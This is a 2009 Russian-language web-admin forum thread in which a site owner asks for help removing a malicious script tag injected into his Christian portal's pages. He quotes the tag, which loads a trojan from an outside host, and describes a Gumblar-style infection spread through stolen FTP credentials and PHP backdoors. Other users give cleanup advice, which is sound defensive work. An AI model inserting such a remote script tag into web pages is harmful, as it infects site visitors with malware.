schtefan 0 Опубликовано: 19 декабря 2009 Рассказать Опубликовано: 19 декабря 2009 Когда я делаю в браузере"исходный код страницы" то появляется интересный код <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head><meta http-equiv="Выберите расширение для паковки" content="text/html; charset=windows-1251" /><meta http-equiv="Выберите расширение для паковки" content="text/html; charset=windows-1251" /><meta http-equiv="Выберите расширение для паковки" content="text/html; charset=windows-1251" /><meta http-equiv="Выберите расширение для паковки" content="text/html; charset=windows-1251" /> <title>Христианский портал</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251" /> <meta name="description" content="Христианский портал" /> <meta name="keywords" content="Новый завет, христианский портал, каналы Online, проповеди, видео, музыка, апокрифы, афоризмы, христианские новости, новый завет Березники, для молодежи, пророчества, свидетельства." /> <meta name="generator" content="DataLife Engine (http://dle-news.ru)" /> <meta name="robots" content="all" /> <meta name="revisit-after" content="1 days" /> <link rel="search" type="application/opensearchdescription+xml" href="http://novy-zavet.ru/engine/opensearch.php" title="Христианский портал" /><link rel="alternate" type="application/rss+xml" title="Христианский портал" href="http://novy-zavet.ru/rss.xml" /> <link rel="alternate" type="application/rss+xml" href="/rss.xml" /> <meta http-equiv="Выберите расширение для паковки" content="text/html; charset=windows-1251" /> <link rel="stylesheet" href="/templates/medizvestie/css/engine.css" type="text/css" /> <link rel="stylesheet" href="/templates/medizvestie/css/style.css" type="text/css" /> <!--[if IE]><link rel="stylesheet" type="text/css" href="/templates/medizvestie/css/ie.css" media="all"/><![endif]--> </head>[b]<script src=http://liverpoolgoldenestates.co.uk/css/12031.php ></script>[/b] Он выделен в самом низу <script src=http://liverpoolgoldenestates.co.uk/css/12031.php ></script>. Весь шаблон перерыл не могу понять где он прописан. из-за него меня банит Google так как при переходе по ссылке сразу идет загрузка трояна! Ссылка на сообщение Поделиться на других сайтах
maks1192 96 Опубликовано: 19 декабря 2009 Рассказать Опубликовано: 19 декабря 2009 Нужно удалить. Это вредностный код. Могу помочь почистить, в Понедельник... Если что - обращался... Ссылка на сообщение Поделиться на других сайтах
Mek 99 Опубликовано: 20 декабря 2009 Рассказать Опубликовано: 20 декабря 2009 Весь шаблон перерыл не могу понять где он прописан. В index.php смотрели ? Ссылка на сообщение Поделиться на других сайтах
schtefan 0 Опубликовано: 20 декабря 2009 Рассказать Опубликовано: 20 декабря 2009 Автор В index.php смотрели ? Что я только не смотрел, все папки-все файлы перерыл. Я дусаю это инфекция, которую называют Gumblar. Проникает на сайты с помощью сворованных с компьютера вебмастера паролей FTP (ворует троян). Далее на сайте с различных каталогах размещаются backdoor PHP скрипты (часто в каталогах с файлами картинок). Так же backdoor код размещается в некоторых существующих .php файлах. После чего в веб страницы и .js файлы вставляются скрипты, на которые было указано выше. Ещё бывает, загружают на сайт в один из подкаталогов эксплойты и вставляют на них ссылки с других сайтов( у меня с liverpoolgoldenestates) Ссылка на сообщение Поделиться на других сайтах
МASTER 11 Опубликовано: 20 декабря 2009 Рассказать Опубликовано: 20 декабря 2009 Откройте notepad++ и сделайте поиск по файлам - "12031.php" Ссылка на сообщение Поделиться на других сайтах
celsoft 6242 Опубликовано: 20 декабря 2009 Рассказать Опубликовано: 20 декабря 2009 schtefan, после потери FTP доступа ваш сайт является скомпрометированным, мог быть добавлен не только этот код, но и модифициарованы PHP файлы которые могут делать теперь что угодно, например ворововать пароли ваших пользователей. И все файлы находящиеся на сервере после этого автоматически становяться небезопасными, т.к. могут быть и невидимые на странице коды. В данном случае нужно не искать что либо в PHP файлах, а перезаливать файлы скрипта на оригинальные из оригинального архива дистрибутива. Ссылка на сообщение Поделиться на других сайтах
schtefan 0 Опубликовано: 20 декабря 2009 Рассказать Опубликовано: 20 декабря 2009 Автор schtefan, после потери FTP доступа ваш сайт является скомпрометированным, мог быть добавлен не только этот код, но и модифициарованы PHP файлы которые могут делать теперь что угодно, например ворововать пароли ваших пользователей. И все файлы находящиеся на сервере после этого автоматически становяться небезопасными, т.к. могут быть и невидимые на странице коды. В данном случае нужно не искать что либо в PHP файлах, а перезаливать файлы скрипта на оригинальные из оригинального архива дистрибутива. У меня и так оригинальный дистрибутив, кроме папки с шаблонами Ссылка на сообщение Поделиться на других сайтах
celsoft 6242 Опубликовано: 20 декабря 2009 Рассказать Опубликовано: 20 декабря 2009 schtefan, Вы перезалили его после появления этого кода? Ссылка на сообщение Поделиться на других сайтах
schtefan 0 Опубликовано: 20 декабря 2009 Рассказать Опубликовано: 20 декабря 2009 Автор schtefan, Вы перезалили его после появления этого кода? да Ссылка на сообщение Поделиться на других сайтах
celsoft 6242 Опубликовано: 20 декабря 2009 Рассказать Опубликовано: 20 декабря 2009 Тогда смотрите шаблоны и рекламу, скорее всего это стоит в main.tpl Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Архивировано
Эта тема находится в архиве и закрыта для публикации сообщений.